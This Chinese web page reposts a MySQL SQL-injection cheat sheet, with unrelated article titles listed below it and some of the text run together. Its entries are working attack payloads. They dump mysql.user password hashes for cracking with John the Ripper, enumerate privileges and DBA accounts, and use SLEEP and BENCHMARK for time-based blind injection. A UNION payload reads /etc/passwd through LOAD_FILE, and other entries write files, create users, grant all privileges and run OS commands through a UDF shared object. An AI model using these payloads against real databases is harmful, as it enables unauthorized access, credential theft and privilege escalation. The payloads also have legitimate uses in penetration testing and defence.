MySQL SQL 常见注入脚本
来源:互联网 发布:linux 配置dhcp 编辑:程序博客网 时间:2024/05/08 00:54
SELECT /*comment*/1;Current User SELECT user();
SELECT system_user();List UsersSELECT user FROM mysql.user; -- privList Password HashesSELECT host, user, password FROM mysql.user; -- privPassword CrackerJohn the Ripper will crack MySQL password hashes.List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECThost, user, Select_priv, Insert_priv, Update_priv, Delete_priv,Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; --priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECTtable_schema, table_name, column_name, privilege_type FROMinformation_schema.column_privileges; -- list privs on columns
List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database SELECT database()List DatabasesSELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0SELECT distinct(db) FROM mysql.db -- privList Columns SELECTtable_schema, table_name, column_name FROM information_schema.columnsWHERE table_schema != 'mysql' AND table_schema != 'information_schema'List TablesSELECTtable_schema,table_name FROM information_schema.tables WHEREtable_schema != 'mysql' AND table_schema != 'information_schema'Find Tables From Column NameSELECTtable_schema, table_name FROM information_schema.columns WHEREcolumn_name = 'username'; -- find table which have a column called'username'Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
SELECT 6 & 1; # returns 0
ASCII Value -> Char
SELECT char(65); # returns AChar -> ASCII ValueSELECT ascii('A'); # returns 65CastingSELECT cast('1' AS unsigned integer);SELECT cast('123' AS char);String ConcatenationSELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC
If Statement
SELECT if(1=1,'foo','bar'); -- returns 'foo'Case StatementSELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns AAvoiding Quotes SELECT 0x414243; # returns ABCTime Delay SELECT BENCHMARK(1000000,MD5('A'));SELECT SLEEP(5); # >= 5.0.12
Make DNS RequestsImpossible?Command Execution
Ifmysqld (<5.0) is running as root AND you compromise a DBA accountyou can execute OS commands by uploading a shared object file into/usr/lib (or similar). The .so file should contain a User DefinedFunction (UDF). raptor_udf.cexplains exactly how you go about this. Remember to compile for thetarget architecture which may or may not be the same as your attackplatform.
Local File Access...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file systemHostname, IP AddressImpossible?Create UsersCREATE USER test1 IDENTIFIED BY 'pass1'; -- privDelete UsersDROP USER test1; -- privMake User DBAGRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- privLocation of DB filesSELECT @@datadir; Default/System Databasesinformation_schema (>= mysql 5.0)
mysql
- MySQL SQL 常见注入脚本
- MSSQL 常见注入脚本
- 网站SQL脚本注入的不常见方法
- SQL脚本注入的不常见方法概括!
- SQL脚本注入的不常见方法概括
- SQL脚本注入的不常见方法概括
- 【sql注入】mysql注入
- 常见SQL注入语句
- 常见sql注入方式
- 常见SQL注入函数
- 常见sql注入方式
- SQL注入脚本问题
- SQL脚本注入1
- SQL注入脚本命令
- sql注入常见万能密码
- 常见sql注入原理详解!
- SQL注入式脚本整理
- SQL 脚本注入攻基础
- 小学生的搞笑考试卷子
- 用Digester解析xml到bean
- runescape money 5 Basic FFXI Gil Tips
- Java语言入门教程(十四):Java语言中方法重载与方法覆盖
- jQuer总结
- MySQL SQL 常见注入脚本
- 使用javascript限制文本框只允许输入数字
- 如何在代码中对由框架自动生成的单据分录三个小按钮设置状态?
- Cursor 详解及使用
- 史上最倒霉的求职者
- VC编程中常用快捷键
- 应用PHP正则表达式提取某网站中最新发表的代理ip地址
- 常见正则表达式
- JSP里调用FCKeditor网页编辑器